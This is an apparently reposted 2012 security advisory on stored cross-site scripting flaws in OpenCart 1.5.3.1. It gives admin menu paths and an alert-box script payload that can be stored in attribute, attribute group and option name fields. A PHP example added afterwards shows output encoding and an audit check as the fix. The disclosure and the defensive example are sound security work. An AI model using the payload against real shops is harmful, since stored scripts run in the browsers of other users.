
OpenCart CMS Cross Site Scripting

23 Jun 2012 00:00:00 | Reported by $1l3n7 @$$@$$17 | Type: packetstorm | Source: packetstormsecurity.com

Multiple stored XSS vulnerabilities in OpenCart CMS version 1.5.3.1 allow insertion of malicious scripts in the attribute and option name fields.

Code
`TITLE: OpenCart CMS Multiple Stored XSS  
Vendor: OpenCart CMS  
Author: $1l3n7 @$$@$$17  
Email: [email protected]  
Download Link: http://www.opencart.com/index.php?route=download/download  
Versions: 1.5.3.1  
Tested on: Windows 7  
  
  
-------------------------------------------------------------------  
-------------------------------------------------------------------  
Description: OpenCart is an open source PHP-based online shopping cart  
system. A robust e-commerce solution for Internet merchants  
with the ability to create their own online business and  
participate in e-commerce at a minimal cost. OpenCart is  
designed feature rich, easy to use, search engine friendly  
and with a visually appealing interface.  
-------------------------------------------------------------------  
-------------------------------------------------------------------  
  
  
Multiple Persistent XSS:  
  
DEMO:  
  
1:  
  
Select Catalog Drop Down -> Attribute Menu -> Select Attribute  
  
Select Insert Button  
  
In Attribute Name Field  
  
POST DATA= "'-->><script>alert(0)</script>  
  
Similarly  
  
Select Catalog Drop Down -> Attribute Menu -> Select Attribute Groups  
  
Select Insert Button  
  
In Attribute Group Name Field  
  
POST DATA= "'-->><script>alert(0)</script>  
  
2:  
  
Select Catalog Drop Down -> Select Options  
  
Select Insert Button  
  
In Option Name Field  
POST DATA= "'-->><script>alert(0)</script>  
  
  
-------------------------------------------------------------  
  
gr33t1ngs and ShOuTZ to r007k17-w and all my friends..  
`
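
The advisory's test value starts with `"'-->>`, which closes a double-quoted attribute, a single-quoted attribute, an HTML comment and a tag before the script element begins. The following is an added example, not code from OpenCart or from the advisory's author; it shows a name field rendered raw and then with output encoding, plus an audit check for rows stored before a fix. All function names, variable names and sample rows are hypothetical and constructed for illustration.

```php
<?php
// Added example; not OpenCart code. All function and variable names are hypothetical.

// Constructed sample rows standing in for stored attribute/option names.
$storedNames = [
    'Clock speed',
    "\"'-->><script>alert(0)</script>",   // value from the advisory
];

// Encode for HTML text and quoted-attribute contexts. ENT_QUOTES encodes both
// " and ', so the value cannot close either quote style, a tag, or a comment.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Before: the stored name is interpolated raw into a cell and an input value.
function renderRowUnsafe(string $name): string
{
    return '<tr><td>' . $name . '</td>'
         . '<td><input type="text" name="name" value="' . $name . '" /></td></tr>';
}

// After: every interpolation is encoded at output time.
function renderRowSafe(string $name): string
{
    return '<tr><td>' . e($name) . '</td>'
         . '<td><input type="text" name="name" value="' . e($name) . '" /></td></tr>';
}

// Audit helper: rows saved before the fix still hold markup, so flag them for review.
function hasMarkupChars(string $name): bool
{
    return preg_match('/[<>"\']/', $name) === 1;
}

foreach ($storedNames as $name) {
    printf("stored value flagged by audit: %s\n", hasMarkupChars($name) ? 'yes' : 'no');
    printf("raw render contains <script>:  %s\n",
        strpos(renderRowUnsafe($name), '<script>') !== false ? 'yes' : 'no');
    printf("safe render contains <script>: %s\n",
        strpos(renderRowSafe($name), '<script>') !== false ? 'yes' : 'no');
    echo renderRowSafe($name), PHP_EOL, PHP_EOL;
}
```

Encoding at output time protects every page that displays the value, including rows already in the database; the audit helper only identifies which stored names need review.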
